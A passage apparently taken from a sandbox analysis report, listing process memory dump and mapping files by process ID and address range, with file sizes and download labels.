memory/1692-340-0x0000000000AF0000-0x0000000000AF2000-memory.dmp

Filesize
8KB

Download
memory/1692-124-0x0000000000000000-mapping.dmp

Download
memory/1712-163-0x0000000000000000-mapping.dmp

Download
memory/1732-241-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/1732-209-0x0000000000000000-mapping.dmp

Download
memory/1744-103-0x0000000000000000-mapping.dmp

Download
memory/1764-211-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1764-191-0x0000000000000000-mapping.dmp

Download
memory/1780-105-0x0000000000000000-mapping.dmp

Download
memory/1816-84-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1816-85-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1816-96-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1816-94-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1816-93-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1816-86-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1816-89-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1816-98-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/1816-87-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1816-95-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1816-92-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1816-67-0x0000000000000000-mapping.dmp

Download
memory/1816-91-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1816-88-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1816-90-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1816-97-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/1836-148-0x0000000000000000-mapping.dmp

Download
memory/1836-208-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/1836-206-0x0000000000260000-0x0000000000269000-memory.dmp

Filesize
36KB

Download
memory/1836-205-0x0000000000230000-0x0000000000260000-memory.dmp

Filesize
192KB

Download
memory/1848-176-0x0000000000000000-mapping.dmp

Download
memory/1848-277-0x000000001AA30000-0x000000001AA32000-memory.dmp

Filesize
8KB

Download
memory/1924-370-0x0000000001FA0000-0x0000000002075000-memory.dmp

Filesize
852KB

Download
memory/1924-371-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/1924-369-0x00000000002F0000-0x000000000036B000-memory.dmp

Filesize
492KB

Download
memory/1984-238-0x0000000000400000-0x0000000000C8E000-memory.dmp

Filesize
8.6MB

Download
memory/1984-233-0x0000000002BD0000-0x0000000002FB6000-memory.dmp

Filesize
3.9MB

Download
memory/1984-186-0x0000000000000000-mapping.dmp

Download
memory/1984-353-0x00000000012D0000-0x00000000012D2000-memory.dmp

Filesize
8KB

Download
memory/1984-236-0x0000000002FC0000-0x0000000003833000-memory.dmp

Filesize
8.4MB

Download
memory/2004-115-0x0000000000000000-mapping.dmp

Download
memory/2128-366-0x0000000000810000-0x0000000000811000-memory.dmp

Filesize
4KB

Download
memory/2144-381-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/2144-379-0x0000000000230000-0x000000000027A000-memory.dmp

Filesize
296KB

Download
memory/2144-380-0x0000000000230000-0x000000000027A000-memory.dmp

Filesize
296KB

Download
memory/2164-332-0x0000000000000000-mapping.dmp

Download
memory/2164-244-0x0000000000000000-mapping.dmp

Download
memory/2208-261-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2208-246-0x0000000000000000-mapping.dmp

Download
memory/2248-304-0x0000000000000000-mapping.dmp

Download
memory/2256-267-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/2256-250-0x0000000000000000-mapping.dmp

Download
memory/2276-326-0x0000000000000000-mapping.dmp

Download
memory/2292-266-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/2292-255-0x00000000004161D7-mapping.dmp

Download
memory/2308-305-0x0000000000000000-mapping.dmp

Download
memory/2372-259-0x0000000000000000-mapping.dmp

Download
memory/2400-260-0x0000000000000000-mapping.dmp

Download
memory/2400-272-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/2452-307-0x0000000000000000-mapping.dmp

Download
memory/2468-410-0x000000001A864000-0x000000001A866000-memory.dmp

Filesize
8KB

Download
memory/2468-409-0x000000001A862000-0x000000001A864000-memory.dmp

Filesize
8KB

Download
memory/2484-310-0x0000000000000000-mapping.dmp

Download
memory/2564-362-0x0000000000240000-0x000000000027A000-memory.dmp

Filesize
232KB

Download
memory/2564-364-0x00000000002A0000-0x00000000002B2000-memory.dmp

Filesize
72KB

Download
memory/2588-334-0x0000000000000000-mapping.dmp

Download
memory/2588-335-0x0000000000A70000-0x0000000000A72000-memory.dmp

Filesize
8KB

Download
memory/2748-320-0x0000000004CF0000-0x0000000004CF1000-memory.dmp

Filesize
4KB

Download
memory/2748-298-0x0000000000418F02-mapping.dmp

Download
memory/2800-279-0x0000000000000000-mapping.dmp

Download
memory/2860-367-0x000000001B120000-0x000000001B122000-memory.dmp

Filesize
8KB

Download
memory/2864-284-0x0000000000000000-mapping.dmp

Download
memory/2876-285-0x0000000000000000-mapping.dmp

Download
memory/2916-288-0x0000000000000000-mapping.dmp

Download
memory/2932-289-0x0000000000000000-mapping.dmp

Download
memory/2980-316-0x0000000000418F06-mapping.dmp

Download
memory/2980-321-0x0000000004BE0000-0x0000000004BE1000-memory.dmp

Filesize
4KB

Download
memory/3028-346-0x0000000000590000-0x0000000000591000-memory.dmp

Filesize
4KB

Download
memory/3268-389-0x000000001AF70000-0x000000001AF72000-memory.dmp

Filesize
8KB

Download
memory/3348-390-0x000000001ABD0000-0x000000001ABD2000-memory.dmp

Filesize
8KB

Download
memory/3396-391-0x0000000000ED0000-0x0000000000ED2000-memory.dmp

Filesize
8KB

Download
memory/3844-396-0x00000000001F0000-0x0000000000410000-memory.dmp

Filesize
2.1MB

Download
memory/3844-397-0x000000001B0A2000-0x000000001B0A4000-memory.dmp

Filesize
8KB

Download
memory/3844-400-0x000000001B0A4000-0x000000001B0A6000-memory.dmp

Filesize
8KB

Download
memory/3844-401-0x000000001B0A6000-0x000000001B0A7000-memory.dmp

Filesize
4KB

Download
memory/3844-402-0x000000001B0A7000-0x000000001B0A8000-memory.dmp

Filesize
4KB

Download